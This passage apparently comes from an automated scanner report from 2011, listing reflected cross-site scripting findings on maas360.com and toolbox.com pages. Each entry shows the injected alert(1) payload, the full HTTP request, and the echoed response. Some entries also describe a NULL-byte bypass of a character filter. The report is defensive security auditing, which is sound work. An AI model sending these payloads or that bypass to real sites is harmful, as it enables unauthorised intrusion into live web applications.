<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ecef"><script>alert(1)</script>c72cf329bb7 was submitted in the utm_campaign parameter. This input was echoed as 1ecef\"><script>alert(1)</script>c72cf329bb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /white-paper/?id=95&A=marchex&O=HS&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial1ecef"><script>alert(1)</script>c72cf329bb7&utm_term=Toolbox HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Wed, 26 Jan 2011 14:56:01 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Wed, 26 Jan 2011 14:56:01 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14963
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fb94"><script>alert(1)</script>1de023c3ac0 was submitted in the utm_medium parameter. This input was echoed as 1fb94\"><script>alert(1)</script>1de023c3ac0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /white-paper/?id=95&A=marchex&O=HS&utm_source=marchex&utm_medium=cpc1fb94"><script>alert(1)</script>1de023c3ac0&utm_campaign=Financial&utm_term=Toolbox HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Wed, 26 Jan 2011 14:55:56 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Wed, 26 Jan 2011 14:55:56 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14963
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b7e8"><script>alert(1)</script>d8aa60128b1 was submitted in the utm_source parameter. This input was echoed as 3b7e8\"><script>alert(1)</script>d8aa60128b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /white-paper/?id=95&A=marchex&O=HS&utm_source=marchex3b7e8"><script>alert(1)</script>d8aa60128b1&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolbox HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Wed, 26 Jan 2011 14:55:54 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Wed, 26 Jan 2011 14:55:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14963
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of the utm_term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db93f"><script>alert(1)</script>9bc17df5d49 was submitted in the utm_term parameter. This input was echoed as db93f\"><script>alert(1)</script>9bc17df5d49 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /white-paper/?id=95&A=marchex&O=HS&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolboxdb93f"><script>alert(1)</script>9bc17df5d49 HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Wed, 26 Jan 2011 14:56:03 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Wed, 26 Jan 2011 14:56:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14963
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
3.37. http://infor.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://infor.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6ec6"style%3d"x%3aexpression(alert(1))"0e278d69efd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d6ec6"style="x:expression(alert(1))"0e278d69efd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?d6ec6"style%3d"x%3aexpression(alert(1))"0e278d69efd=1 HTTP/1.1
Host: infor.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 54401
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=qoula355jchnl0am2e3e2i55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:08 GMT
Connection: close
3.38. http://infor.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://infor.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14fe2'-alert(1)-'cfeea45fd7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?14fe2'-alert(1)-'cfeea45fd7b=1 HTTP/1.1
Host: infor.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 54286
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ww5znmesfgdrusjq50mcwm45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:10 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Infor Commu ...[SNIP]... der != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2finfor.ittoolbox.com%2fDefault.aspx%3f14fe2'-alert(1)-'cfeea45fd7b%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of the 306f2'-alert(1)-'2382eb5920b request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e98d'-alert(1)-'3c5ebd829e6 was submitted in the 306f2'-alert(1)-'2382eb5920b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=13e98d'-alert(1)-'3c5ebd829e6 HTTP/1.1
Host: it.toolbox.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:38 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26306f2'-alert(1)-'2382eb5920b%3d13e98d'-alert(1)-'3c5ebd829e6'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.40. http://it.toolbox.com/blogs/ppmtoday [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 608cc'-alert(1)-'435b0e52deb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1&608cc'-alert(1)-'435b0e52deb=1 HTTP/1.1
Host: it.toolbox.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:50 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26306f2'-alert(1)-'2382eb5920b%3d1%26608cc'-alert(1)-'435b0e52deb%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.41. http://it.toolbox.com/blogs/ppmtoday/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2483'-alert(1)-'56ce208cc66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/?c2483'-alert(1)-'56ce208cc66=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63736
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:11 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26c2483'-alert(1)-'56ce208cc66%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c79b'-alert(1)-'bf6491b2e46 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/categories/6c79b'-alert(1)-'bf6491b2e46/2379 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61385
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:29 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fcategories.aspx%3fslug%3dppmtoday%266c79b'-alert(1)-'bf6491b2e46%2f2379'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fd03'-alert(1)-'5edd216a3b5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/categories/2fd03'-alert(1)-'5edd216a3b5/1191 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61383
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:31 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fcategories.aspx%3fslug%3dppmtoday%262fd03'-alert(1)-'5edd216a3b5%2f1191'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cb4b'-alert(1)-'b15eda6d188 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/categories/4cb4b'-alert(1)-'b15eda6d188/2765 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61383
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:35 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fcategories.aspx%3fslug%3dppmtoday%264cb4b'-alert(1)-'b15eda6d188%2f2765'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ce90'-alert(1)-'1098153feb9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/categories/6ce90'-alert(1)-'1098153feb9/1192 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61385
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:48 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fcategories.aspx%3fslug%3dppmtoday%266ce90'-alert(1)-'1098153feb9%2f1192'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80718'-alert(1)-'50bcf3adcd9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/categories/80718'-alert(1)-'50bcf3adcd9/1193 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61383
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:36 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fcategories.aspx%3fslug%3dppmtoday%2680718'-alert(1)-'50bcf3adcd9%2f1193'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62752'-alert(1)-'917fbaa7ac8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/62752'-alert(1)-'917fbaa7ac8 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63838
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:15 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%2662752'-alert(1)-'917fbaa7ac8'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.48. http://it.toolbox.com/blogs/ppmtoday/change-origins-39674 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/change-origins-39674
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6adc7'-alert(1)-'c1d11b6e461 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/change-origins-39674?6adc7'-alert(1)-'c1d11b6e461=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68916
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:40 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:39 GMT
Connection: close
